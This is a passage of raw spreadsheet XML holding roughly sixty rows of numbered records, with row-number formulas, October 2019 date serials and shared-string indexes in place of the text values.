        <v>19637</v>
      </c>
      <c r="D13995" s="1">
        <v>43744</v>
      </c>
      <c r="E13995" t="s">
        <v>19767</v>
      </c>
      <c r="F13995" t="s">
        <v>10526</v>
      </c>
      <c r="G13995" t="s">
        <v>24393</v>
      </c>
    </row>
    <row r="13996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13996">
        <f t="shared" si="218"/>
        <v>13995</v>
      </c>
      <c r="B13996">
        <v>3995</v>
      </c>
      <c r="C13996" t="s">
        <v>19637</v>
      </c>
      <c r="D13996" s="1">
        <v>43747</v>
      </c>
      <c r="E13996" t="s">
        <v>19705</v>
      </c>
      <c r="F13996" t="s">
        <v>10021</v>
      </c>
      <c r="G13996" t="s">
        <v>24394</v>
      </c>
    </row>
    <row r="13997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13997">
        <f t="shared" si="218"/>
        <v>13996</v>
      </c>
      <c r="B13997">
        <v>3996</v>
      </c>
      <c r="C13997" t="s">
        <v>19637</v>
      </c>
      <c r="D13997" s="1">
        <v>43757</v>
      </c>
      <c r="E13997" t="s">
        <v>21678</v>
      </c>
      <c r="F13997" t="s">
        <v>9975</v>
      </c>
      <c r="G13997" t="s">
        <v>24395</v>
      </c>
    </row>
    <row r="13998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13998">
        <f t="shared" si="218"/>
        <v>13997</v>
      </c>
      <c r="B13998">
        <v>3997</v>
      </c>
      <c r="C13998" t="s">
        <v>19637</v>
      </c>
      <c r="D13998" s="1">
        <v>43752</v>
      </c>
      <c r="E13998" t="s">
        <v>21273</v>
      </c>
      <c r="F13998" t="s">
        <v>9978</v>
      </c>
      <c r="G13998" t="s">
        <v>24396</v>
      </c>
    </row>
    <row r="13999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13999">
        <f t="shared" si="218"/>
        <v>13998</v>
      </c>
      <c r="B13999">
        <v>3998</v>
      </c>
      <c r="C13999" t="s">
        <v>19637</v>
      </c>
      <c r="D13999" s="1">
        <v>43742</v>
      </c>
      <c r="E13999" t="s">
        <v>21759</v>
      </c>
      <c r="F13999" t="s">
        <v>9978</v>
      </c>
      <c r="G13999" t="s">
        <v>24397</v>
      </c>
    </row>
    <row r="14000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14000">
        <f t="shared" si="218"/>
        <v>13999</v>
      </c>
      <c r="B14000">
        <v>3999</v>
      </c>
      <c r="C14000" t="s">
        <v>19637</v>
      </c>
      <c r="D14000" s="1">
        <v>43739</v>
      </c>
      <c r="E14000" t="s">
        <v>24398</v>
      </c>
      <c r="F14000" t="s">
        <v>10526</v>
      </c>
      <c r="G14000" t="s">
        <v>24399</v>
      </c>
    </row>
    <row r="14001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14001">
        <f t="shared" si="218"/>
        <v>14000</v>
      </c>
      <c r="B14001">
        <v>4000</v>
      </c>
      <c r="C14001" t="s">
        <v>19637</v>
      </c>
      <c r="D14001" s="1">
        <v>43754</v>
      </c>
      <c r="E14001" t="s">
        <v>19640</v>
      </c>
      <c r="F14001" t="s">
        <v>9975</v>
      </c>
      <c r="G14001" t="s">
        <v>24400</v>
      </c>
    </row>
    <row r="14002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14002">
        <f t="shared" si="218"/>
        <v>14001</v>
      </c>
      <c r="B14002">
        <v>4001</v>
      </c>
      <c r="C14002" t="s">
        <v>19637</v>
      </c>
      <c r="D14002" s="1">
        <v>43753</v>
      </c>
      <c r="E14002" t="s">
        <v>19680</v>
      </c>
      <c r="F14002" t="s">
        <v>10021</v>
      </c>
      <c r="G14002" t="s">
        <v>24401</v>
      </c>
    </row>
    <row r="14003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14003">
        <f t="shared" si="218"/>
        <v>14002</v>
      </c>
      <c r="B14003">
        <v>4002</v>
      </c>
      <c r="C14003" t="s">
        <v>19637</v>
      </c>
      <c r="D14003" s="1">
        <v>43747</v>
      </c>
      <c r="F14003" t="s">
        <v>10526</v>
      </c>
      <c r="G14003" t="s">
        <v>22076</v>
      </c>
    </row>
    <row r="14004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14004">
        <f t="shared" si="218"/>
        <v>14003</v>
      </c>
      <c r="B14004">
        <v>4003</v>
      </c>
      <c r="C14004" t="s">
        <v>19637</v>
      </c>
      <c r="D14004" s="1">
        <v>43740</v>
      </c>
      <c r="E14004" t="s">
        <v>24402</v>
      </c>
      <c r="F14004" t="s">
        <v>10526</v>
      </c>
      <c r="G14004" t="s">
        <v>24403</v>
      </c>
    </row>
    <row r="14005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14005">
        <f t="shared" si="218"/>
        <v>14004</v>
      </c>
      <c r="B14005">
        <v>4004</v>
      </c>
      <c r="C14005" t="s">
        <v>19637</v>
      </c>
      <c r="D14005" s="1">
        <v>43742</v>
      </c>
      <c r="E14005" t="s">
        <v>20862</v>
      </c>
      <c r="F14005" t="s">
        <v>10021</v>
      </c>
      <c r="G14005" t="s">
        <v>24404</v>
      </c>
    </row>
    <row r="14006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14006">
        <f t="shared" si="218"/>
        <v>14005</v>
      </c>
      <c r="B14006">
        <v>4005</v>
      </c>
      <c r="C14006" t="s">
        <v>19637</v>
      </c>
      <c r="D14006" s="1">
        <v>43741</v>
      </c>
      <c r="E14006" t="s">
        <v>19643</v>
      </c>
      <c r="F14006" t="s">
        <v>10021</v>
      </c>
      <c r="G14006" t="s">
        <v>24405</v>
      </c>
    </row>
    <row r="14007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14007">
        <f t="shared" si="218"/>
        <v>14006</v>
      </c>
      <c r="B14007">
        <v>4006</v>
      </c>
      <c r="C14007" t="s">
        <v>19637</v>
      </c>
      <c r="D14007" s="1">
        <v>43745</v>
      </c>
      <c r="E14007" t="s">
        <v>24406</v>
      </c>
      <c r="F14007" t="s">
        <v>10526</v>
      </c>
      <c r="G14007" t="s">
        <v>24407</v>
      </c>
    </row>
    <row r="14008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14008">
        <f t="shared" si="218"/>
        <v>14007</v>
      </c>
      <c r="B14008">
        <v>4007</v>
      </c>
      <c r="C14008" t="s">
        <v>19637</v>
      </c>
      <c r="D14008" s="1">
        <v>43745</v>
      </c>
      <c r="E14008" t="s">
        <v>24408</v>
      </c>
      <c r="F14008" t="s">
        <v>10526</v>
      </c>
      <c r="G14008" t="s">
        <v>24409</v>
      </c>
    </row>
    <row r="14009" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14009">
        <f t="shared" si="218"/>
        <v>14008</v>
      </c>
      <c r="B14009">
        <v>4008</v>
      </c>
      <c r="C14009" t="s">
        <v>19637</v>
      </c>
      <c r="D14009" s="1">
        <v>43752</v>
      </c>
      <c r="E14009" t="s">
        <v>22161</v>
      </c>
      <c r="F14009" t="s">
        <v>10021</v>
      </c>
      <c r="G14009" t="s">
        <v>24410</v>
      </c>
    </row>
    <row r="14010" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14010">
        <f t="shared" si="218"/>
        <v>14009</v>
      </c>
      <c r="B14010">
        <v>4009</v>
      </c>
      <c r="C14010" t="s">
        <v>19637</v>
      </c>
      <c r="D14010" s="1">
        <v>43742</v>
      </c>
      <c r="E14010" t="s">
        <v>19640</v>
      </c>
      <c r="F14010" t="s">
        <v>9975</v>
      </c>
      <c r="G14010" t="s">
        <v>24411</v>
      </c>
    </row>
    <row r="14011" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14011">
        <f t="shared" si="218"/>
        <v>14010</v>
      </c>
      <c r="B14011">
        <v>4010</v>
      </c>
      <c r="C14011" t="s">
        <v>19637</v>
      </c>
      <c r="D14011" s="1">
        <v>43756</v>
      </c>
      <c r="E14011" t="s">
        <v>20009</v>
      </c>
      <c r="F14011" t="s">
        <v>10021</v>
      </c>
      <c r="G14011" t="s">
        <v>24412</v>
      </c>
    </row>
    <row r="14012" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14012">
        <f t="shared" si="218"/>
        <v>14011</v>
      </c>
      <c r="B14012">
        <v>4011</v>
      </c>
      <c r="C14012" t="s">
        <v>19637</v>
      </c>
      <c r="D14012" s="1">
        <v>43739</v>
      </c>
      <c r="E14012" t="s">
        <v>23785</v>
      </c>
      <c r="F14012" t="s">
        <v>9978</v>
      </c>
      <c r="G14012" t="s">
        <v>24413</v>
      </c>
    </row>
    <row r="14013" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14013">
        <f t="shared" si="218"/>
        <v>14012</v>
      </c>
      <c r="B14013">
        <v>4012</v>
      </c>
      <c r="C14013" t="s">
        <v>19637</v>
      </c>
      <c r="D14013" s="1">
        <v>43751</v>
      </c>
      <c r="E14013" t="s">
        <v>19680</v>
      </c>
      <c r="F14013" t="s">
        <v>10021</v>
      </c>
      <c r="G14013" t="s">
        <v>24414</v>
      </c>
    </row>
    <row r="14014" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14014">
        <f t="shared" si="218"/>
        <v>14013</v>
      </c>
      <c r="B14014">
        <v>4013</v>
      </c>
      <c r="C14014" t="s">
        <v>19637</v>
      </c>
      <c r="D14014" s="1">
        <v>43740</v>
      </c>
      <c r="E14014" t="s">
        <v>24415</v>
      </c>
      <c r="F14014" t="s">
        <v>10526</v>
      </c>
      <c r="G14014" t="s">
        <v>24416</v>
      </c>
    </row>
    <row r="14015" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14015">
        <f t="shared" si="218"/>
        <v>14014</v>
      </c>
      <c r="B14015">
        <v>4014</v>
      </c>
      <c r="C14015" t="s">
        <v>19637</v>
      </c>
      <c r="D14015" s="1">
        <v>43754</v>
      </c>
      <c r="E14015" t="s">
        <v>24417</v>
      </c>
      <c r="F14015" t="s">
        <v>9978</v>
      </c>
      <c r="G14015" t="s">
        <v>24418</v>
      </c>
    </row>
    <row r="14016" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14016">
        <f t="shared" si="218"/>
        <v>14015</v>
      </c>
      <c r="B14016">
        <v>4015</v>
      </c>
      <c r="C14016" t="s">
        <v>19637</v>
      </c>
      <c r="D14016" s="1">
        <v>43747</v>
      </c>
      <c r="F14016" t="s">
        <v>10526</v>
      </c>
      <c r="G14016" t="s">
        <v>24419</v>
      </c>
    </row>
    <row r="14017" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14017">
        <f t="shared" si="218"/>
        <v>14016</v>
      </c>
      <c r="B14017">
        <v>4016</v>
      </c>
      <c r="C14017" t="s">
        <v>19637</v>
      </c>
      <c r="D14017" s="1">
        <v>43739</v>
      </c>
      <c r="E14017" t="s">
        <v>19860</v>
      </c>
      <c r="F14017" t="s">
        <v>10526</v>
      </c>
      <c r="G14017" t="s">
        <v>24420</v>
      </c>
    </row>
    <row r="14018" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14018">
        <f t="shared" si="218"/>
        <v>14017</v>
      </c>
      <c r="B14018">
        <v>4017</v>
      </c>
      <c r="C14018" t="s">
        <v>19637</v>
      </c>
      <c r="D14018" s="1">
        <v>43746</v>
      </c>
      <c r="E14018" t="s">
        <v>19640</v>
      </c>
      <c r="F14018" t="s">
        <v>10021</v>
      </c>
      <c r="G14018" t="s">
        <v>24421</v>
      </c>
    </row>
    <row r="14019" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14019">
        <f t="shared" ref="A14019:A14082" si="219">+ROW(A14018)</f>
        <v>14018</v>
      </c>
      <c r="B14019">
        <v>4018</v>
      </c>
      <c r="C14019" t="s">
        <v>19637</v>
      </c>
      <c r="D14019" s="1">
        <v>43751</v>
      </c>
      <c r="E14019" t="s">
        <v>24422</v>
      </c>
      <c r="F14019" t="s">
        <v>10526</v>
      </c>
      <c r="G14019" t="s">
        <v>24423</v>
      </c>
    </row>
    <row r="14020" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14020">
        <f t="shared" si="219"/>
        <v>14019</v>
      </c>
      <c r="B14020">
        <v>4019</v>
      </c>
      <c r="C14020" t="s">
        <v>19637</v>
      </c>
      <c r="D14020" s="1">
        <v>43754</v>
      </c>
      <c r="E14020" t="s">
        <v>19680</v>
      </c>
      <c r="F14020" t="s">
        <v>10021</v>
      </c>
      <c r="G14020" t="s">
        <v>24424</v>
      </c>
    </row>
    <row r="14021" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14021">
        <f t="shared" si="219"/>
        <v>14020</v>
      </c>
      <c r="B14021">
        <v>4020</v>
      </c>
      <c r="C14021" t="s">
        <v>19637</v>
      </c>
      <c r="D14021" s="1">
        <v>43755</v>
      </c>
      <c r="E14021" t="s">
        <v>24425</v>
      </c>
      <c r="F14021" t="s">
        <v>10526</v>
      </c>
      <c r="G14021" t="s">
        <v>24426</v>
      </c>
    </row>
    <row r="14022" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14022">
        <f t="shared" si="219"/>
        <v>14021</v>
      </c>
      <c r="B14022">
        <v>4021</v>
      </c>
      <c r="C14022" t="s">
        <v>19637</v>
      </c>
      <c r="D14022" s="1">
        <v>43753</v>
      </c>
      <c r="E14022" t="s">
        <v>19834</v>
      </c>
      <c r="F14022" t="s">
        <v>10526</v>
      </c>
      <c r="G14022" t="s">
        <v>24427</v>
      </c>
    </row>
    <row r="14023" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14023">
        <f t="shared" si="219"/>
        <v>14022</v>
      </c>
      <c r="B14023">
        <v>4022</v>
      </c>
      <c r="C14023" t="s">
        <v>19637</v>
      </c>
      <c r="D14023" s="1">
        <v>43742</v>
      </c>
      <c r="E14023" t="s">
        <v>23123</v>
      </c>
      <c r="F14023" t="s">
        <v>10526</v>
      </c>
      <c r="G14023" t="s">
        <v>24428</v>
      </c>
    </row>
    <row r="14024" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14024">
        <f t="shared" si="219"/>
        <v>14023</v>
      </c>
      <c r="B14024">
        <v>4023</v>
      </c>
      <c r="C14024" t="s">
        <v>19637</v>
      </c>
      <c r="D14024" s="1">
        <v>43741</v>
      </c>
      <c r="E14024" t="s">
        <v>19680</v>
      </c>
      <c r="F14024" t="s">
        <v>10021</v>
      </c>
      <c r="G14024" t="s">
        <v>24429</v>
      </c>
    </row>
    <row r="14025" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14025">
        <f t="shared" si="219"/>
        <v>14024</v>
      </c>
      <c r="B14025">
        <v>4024</v>
      </c>
      <c r="C14025" t="s">
        <v>19637</v>
      </c>
      <c r="D14025" s="1">
        <v>43748</v>
      </c>
      <c r="E14025" t="s">
        <v>21918</v>
      </c>
      <c r="F14025" t="s">
        <v>10021</v>
      </c>
      <c r="G14025" t="s">
        <v>24430</v>
      </c>
    </row>
    <row r="14026" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14026">
        <f t="shared" si="219"/>
        <v>14025</v>
      </c>
      <c r="B14026">
        <v>4025</v>
      </c>
      <c r="C14026" t="s">
        <v>19637</v>
      </c>
      <c r="D14026" s="1">
        <v>43742</v>
      </c>
      <c r="E14026" t="s">
        <v>19687</v>
      </c>
      <c r="F14026" t="s">
        <v>10021</v>
      </c>
      <c r="G14026" t="s">
        <v>24431</v>
      </c>
    </row>
    <row r="14027" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14027">
        <f t="shared" si="219"/>
        <v>14026</v>
      </c>
      <c r="B14027">
        <v>4026</v>
      </c>
      <c r="C14027" t="s">
        <v>19637</v>
      </c>
      <c r="D14027" s="1">
        <v>43748</v>
      </c>
      <c r="F14027" t="s">
        <v>10021</v>
      </c>
      <c r="G14027" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14028" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14028">
        <f t="shared" si="219"/>
        <v>14027</v>
      </c>
      <c r="B14028">
        <v>4027</v>
      </c>
      <c r="C14028" t="s">
        <v>19637</v>
      </c>
      <c r="D14028" s="1">
        <v>43756</v>
      </c>
      <c r="F14028" t="s">
        <v>10526</v>
      </c>
      <c r="G14028" t="s">
        <v>24432</v>
      </c>
    </row>
    <row r="14029" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14029">
        <f t="shared" si="219"/>
        <v>14028</v>
      </c>
      <c r="B14029">
        <v>4028</v>
      </c>
      <c r="C14029" t="s">
        <v>19637</v>
      </c>
      <c r="D14029" s="1">
        <v>43752</v>
      </c>
      <c r="E14029" t="s">
        <v>19650</v>
      </c>
      <c r="F14029" t="s">
        <v>10021</v>
      </c>
      <c r="G14029" t="s">
        <v>24433</v>
      </c>
    </row>
    <row r="14030" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14030">
        <f t="shared" si="219"/>
        <v>14029</v>
      </c>
      <c r="B14030">
        <v>4029</v>
      </c>
      <c r="C14030" t="s">
        <v>19637</v>
      </c>
      <c r="D14030" s="1">
        <v>43750</v>
      </c>
      <c r="E14030" t="s">
        <v>19638</v>
      </c>
      <c r="F14030" t="s">
        <v>10021</v>
      </c>
      <c r="G14030" t="s">
        <v>24434</v>
      </c>
    </row>
    <row r="14031" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14031">
        <f t="shared" si="219"/>
        <v>14030</v>
      </c>
      <c r="B14031">
        <v>4030</v>
      </c>
      <c r="C14031" t="s">
        <v>19637</v>
      </c>
      <c r="D14031" s="1">
        <v>43753</v>
      </c>
      <c r="E14031" t="s">
        <v>21039</v>
      </c>
      <c r="F14031" t="s">
        <v>10021</v>
      </c>
      <c r="G14031" t="s">
        <v>24435</v>
      </c>
    </row>
    <row r="14032" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14032">
        <f t="shared" si="219"/>
        <v>14031</v>
      </c>
      <c r="B14032">
        <v>4031</v>
      </c>
      <c r="C14032" t="s">
        <v>19637</v>
      </c>
      <c r="D14032" s="1">
        <v>43738</v>
      </c>
      <c r="E14032" t="s">
        <v>19640</v>
      </c>
      <c r="F14032" t="s">
        <v>10021</v>
      </c>
      <c r="G14032" t="s">
        <v>24436</v>
      </c>
    </row>
    <row r="14033" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14033">
        <f t="shared" si="219"/>
        <v>14032</v>
      </c>
      <c r="B14033">
        <v>4032</v>
      </c>
      <c r="C14033" t="s">
        <v>19637</v>
      </c>
      <c r="D14033" s="1">
        <v>43753</v>
      </c>
      <c r="E14033" t="s">
        <v>20291</v>
      </c>
      <c r="F14033" t="s">
        <v>10526</v>
      </c>
      <c r="G14033" t="s">
        <v>24437</v>
      </c>
    </row>
    <row r="14034" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14034">
        <f t="shared" si="219"/>
        <v>14033</v>
      </c>
      <c r="B14034">
        <v>4033</v>
      </c>
      <c r="C14034" t="s">
        <v>19637</v>
      </c>
      <c r="D14034" s="1">
        <v>43749</v>
      </c>
      <c r="E14034" t="s">
        <v>19640</v>
      </c>
      <c r="F14034" t="s">
        <v>10021</v>
      </c>
      <c r="G14034" t="s">
        <v>24438</v>
      </c>
    </row>
    <row r="14035" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14035">
        <f t="shared" si="219"/>
        <v>14034</v>
      </c>
      <c r="B14035">
        <v>4034</v>
      </c>
      <c r="C14035" t="s">
        <v>19637</v>
      </c>
      <c r="D14035" s="1">
        <v>43743</v>
      </c>
      <c r="E14035" t="s">
        <v>19640</v>
      </c>
      <c r="F14035" t="s">
        <v>10021</v>
      </c>
      <c r="G14035" t="s">
        <v>24439</v>
      </c>
    </row>
    <row r="14036" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14036">
        <f t="shared" si="219"/>
        <v>14035</v>
      </c>
      <c r="B14036">
        <v>4035</v>
      </c>
      <c r="C14036" t="s">
        <v>19637</v>
      </c>
      <c r="D14036" s="1">
        <v>43740</v>
      </c>
      <c r="E14036" t="s">
        <v>20118</v>
      </c>
      <c r="F14036" t="s">
        <v>9978</v>
      </c>
      <c r="G14036" t="s">
        <v>24440</v>
      </c>
    </row>
    <row r="14037" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14037">
        <f t="shared" si="219"/>
        <v>14036</v>
      </c>
      <c r="B14037">
        <v>4036</v>
      </c>
      <c r="C14037" t="s">
        <v>19637</v>
      </c>
      <c r="D14037" s="1">
        <v>43748</v>
      </c>
      <c r="F14037" t="s">
        <v>9975</v>
      </c>
      <c r="G14037" t="s">
        <v>24441</v>
      </c>
    </row>
    <row r="14038" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14038">
        <f t="shared" si="219"/>
        <v>14037</v>
      </c>
      <c r="B14038">
        <v>4037</v>
      </c>
      <c r="C14038" t="s">
        <v>19637</v>
      </c>
      <c r="D14038" s="1">
        <v>43752</v>
      </c>
      <c r="E14038" t="s">
        <v>22413</v>
      </c>
      <c r="F14038" t="s">
        <v>10526</v>
      </c>
      <c r="G14038" t="s">
        <v>24442</v>
      </c>
    </row>
    <row r="14039" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14039">
        <f t="shared" si="219"/>
        <v>14038</v>
      </c>
      <c r="B14039">
        <v>4038</v>
      </c>
      <c r="C14039" t="s">
        <v>19637</v>
      </c>
      <c r="D14039" s="1">
        <v>43748</v>
      </c>
      <c r="F14039" t="s">
        <v>10526</v>
      </c>
      <c r="G14039" t="s">
        <v>24443</v>
      </c>
    </row>
    <row r="14040" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14040">
        <f t="shared" si="219"/>
        <v>14039</v>
      </c>
      <c r="B14040">
        <v>4039</v>
      </c>
      <c r="C14040" t="s">
        <v>19637</v>
      </c>
      <c r="D14040" s="1">
        <v>43741</v>
      </c>
      <c r="E14040" t="s">
        <v>19643</v>
      </c>
      <c r="F14040" t="s">
        <v>10021</v>
      </c>
      <c r="G14040" t="s">
        <v>24444</v>
      </c>
    </row>
    <row r="14041" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14041">
        <f t="shared" si="219"/>
        <v>14040</v>
      </c>
      <c r="B14041">
        <v>4040</v>
      </c>
      <c r="C14041" t="s">
        <v>19637</v>
      </c>
      <c r="D14041" s="1">
        <v>43738</v>
      </c>
      <c r="F14041" t="s">
        <v>10526</v>
      </c>
      <c r="G14041" t="s">
        <v>24445</v>
      </c>
    </row>
    <row r="14042" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14042">
        <f t="shared" si="219"/>
        <v>14041</v>
      </c>
      <c r="B14042">
        <v>4041</v>
      </c>
      <c r="C14042" t="s">
        <v>19637</v>
      </c>
      <c r="D14042" s="1">
        <v>43751</v>
      </c>
      <c r="F14042" t="s">
        <v>10021</v>
      </c>
      <c r="G14042" t="s">
        <v>24446</v>
      </c>
    </row>
    <row r="14043" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14043">
        <f t="shared" si="219"/>
        <v>14042</v>
      </c>
      <c r="B14043">
        <v>4042</v>
      </c>
      <c r="C14043" t="s">
        <v>19637</v>
      </c>
      <c r="D14043" s="1">
        <v>43742</v>
      </c>
      <c r="E14043" t="s">
        <v>19648</v>
      </c>
      <c r="F14043" t="s">
        <v>10021</v>
      </c>
      <c r="G14043" t="s">
        <v>24447</v>
      </c>
    </row>
    <row r="14044" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14044">
        <f t="shared" si="219"/>
        <v>14043</v>
      </c>
      <c r="B14044">
        <v>4043</v>
      </c>
      <c r="C14044" t="s">
        <v>19637</v>
      </c>
      <c r="D14044" s="1">
        <v>43739</v>
      </c>
      <c r="F14044" t="s">
        <v>10021</v>
      </c>
      <c r="G14044" t="s">
        <v>24448</v>
      </c>
    </row>
    <row r="14045" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14045">
        <f t="shared" si="219"/>
        <v>14044</v>
      </c>
      <c r="B14045">
        <v>4044</v>
      </c>
      <c r="C14045" t="s">
        <v>19637</v>
      </c>
      <c r="D14045" s="1">
        <v>43757</v>
      </c>
      <c r="E14045" t="s">
        <v>21108</v>
      </c>
      <c r="F14045" t="s">
        <v>10526</v>
      </c>
      <c r="G14045" t="s">
        <v>24449</v>
      </c>
    </row>
    <row r="14046" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14046">
        <f t="shared" si="219"/>
        <v>14045</v>
      </c>
      <c r="B14046">
        <v>4045</v>
      </c>
      <c r="C14046" t="s">
        <v>19637</v>
      </c>
      <c r="D14046" s="1">
        <v>43739</v>
      </c>
      <c r="F14046" t="s">
        <v>10526</v>
      </c>
      <c r="G14046" t="s">
        <v>24450</v>
      </c>
    </row>
    <row r="14047" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14047">
        <f t="shared" si="219"/>
        <v>14046</v>
      </c>
      <c r="B14047">
        <v>4046</v>
      </c>
      <c r="C14047" t="s">
        <v>19637</v>
      </c>
      <c r="D14047" s="1">
        <v>43752</v>
      </c>
      <c r="F14047" t="s">
        <v>10526</v>
      </c>
      <c r="G14047" t="s">
        <v>24451</v>
      </c>
    </row>
    <row r="14048" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14048">
        <f t="shared" si="219"/>
        <v>14047</v>
      </c>
      <c r="B14048">
        <v>4047</v>
      </c>
      <c r="C14048" t="s">
        <v>19637</v>
      </c>
      <c r="D14048" s="1">
        <v>43745</v>
      </c>
      <c r="F14048" t="s">
        <v>10526</v>
      </c>
      <c r="G14048" t="s">
        <v>24452</v>
      </c>
    </row>
    <row r="14049" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14049">
        <f t="shared" si="219"/>
        <v>14048</v>
      </c>
      <c r="B14049">
        <v>4048</v>
      </c>
      <c r="C14049" t="s">
        <v>19637</v>
      </c>
      <c r="D14049" s="1">
        <v>43747</v>
      </c>
      <c r="E14049" t="s">
        <v>19640</v>
      </c>
      <c r="F14049" t="s">
        <v>9975</v>
      </c>
      <c r="G14049" t="s">
        <v>24453</v>
      </c>
    </row>
    <row r="14050" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14050">
        <f t="shared" si="219"/>
        <v>14049</v>
      </c>
      <c r="B14050">
        <v>4049</v>
      </c>
      <c r="C14050" t="s">
        <v>19637</v>
      </c>
      <c r="D14050" s="1">
        <v>43743</v>
      </c>
      <c r="E14050" t="s">
        <v>19668</v>
      </c>
      <c r="F14050" t="s">
        <v>9978</v>
      </c>
      <c r="G14050" t="s">
        <v>24454</v>
      </c>
    </row>
    <row r="14051" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14051">
        <f t="shared" si="219"/>
        <v>14050</v>
      </c>
      <c r="B14051">
        <v>4050</v>
      </c>
      <c r="C14051" t="s">
        <v>19637</v>
      </c>
      <c r="D14051" s="1">
        <v>43746</v>
      </c>
      <c r="E14051" t="s">
        <v>19640</v>
      </c>
      <c r="F14051" t="s">
        <v>10021</v>
      </c>
      <c r="G14051" t="s">
        <v>24455</v>
      </c>
    </row>
    <row r="14052" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14052">
        <f t="shared" si="219"/>
        <v>14051</v>
      </c>
      <c r="B14052">
        <v>4051</v>
      </c>
      <c r="C14052" t="s">
        <v>19637</v>
      </c>
      <c r="D14052" s="1">
        <v>43745</v>
      </c>
      <c r="E14052" t="s">
        <v>19640</v>
      </c>
      <c r="F14052" t="s">
        <v>9975</v>
      </c>
      <c r="G14052" t="s">
        <v>24456</v>
      </c>
    </row>
    <row r="14053" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14053">
        <f t="shared" si="219"/>
        <v>14052</v>
      </c>
      <c r="B14053">
        <v>4052</v>
      </c>
      <c r="C14053" t="s">
        <v>19637</v>
      </c>
      <c r="D14053" s="1">
        <v>43744</v>
      </c>
      <c r="F14053" t="s">
        <v>10526</v>
      </c>
      <c r="G14053" t="s">
        <v>24457</v>
      </c>
    </row>
    <row r="14054" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14054">
        <f t="shared" si="219"/>
        <v>14053</v>
      </c>
      <c r="B14054">
        <v>4053</v>
      </c>
      <c r="C14054" t="s">
        <v>19637</v>
      </c>
      <c r="D14054" s="1">
        <v>43743</v>
      </c>
      <c r="E14054" t="s">
        <v>24458</v>
      </c>
      <c r="F14054" t="s">
        <v>10526</v>
      </c>
      <c r="G14054" t="s">
        <v>24459</v>
      </c>
    </row>
    <row r="14055" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14055">
        <f t="shared" si="219"/>
        <v>14054</v>
      </c>
      <c r="B14055">
        <v>4054</v>
      </c>
      <c r="C14055" t="s">
        <v>19637</v>
      </c>
      <c r="D14055" s="1">
        <v>43752</v>
      </c>
      <c r="E14055" t="s">
        <v>24460</v>
      </c>
      <c r="F14055" t="s">
        <v>9978</v>
      </c>
      <c r="G14055" t="s">
        <v>24461</v>
      </c>
    </row>
    <row r="14056" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14056">
        <f t="shared" si="219"/>
        <v>14055</v>
      </c>
      <c r="B14056">
        <v>4055</v>
      </c>
      <c r="C14056" t="s">
        <v>19637</v>
      </c>
      <c r="D14056" s="1">
        <v>43756</v>
      </c>
      <c r="E14056" t="s">
        <v>22869</v>
      </c>
      <c r="F14056" t="s">
        <v>10021</v>
      </c>
      <c r="G14056" t="s">
        <v>24462</v>
      </c>
    </row>
    <row r="14057" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14057">
        <f t="shared" si="219"/>
        <v>14056</v>
      </c>
      <c r="B14057">
        <v>4056</v>
      </c>
      <c r="C14057" t="s">
        <v>19637</v>
      </c>
      <c r="D14057" s="1">
        <v>43753</v>
      </c>
      <c r="E14057" t="s">
        <v>24463</v>
      </c>
      <c r="F14057" t="s">
        <v>10526</v>
      </c>
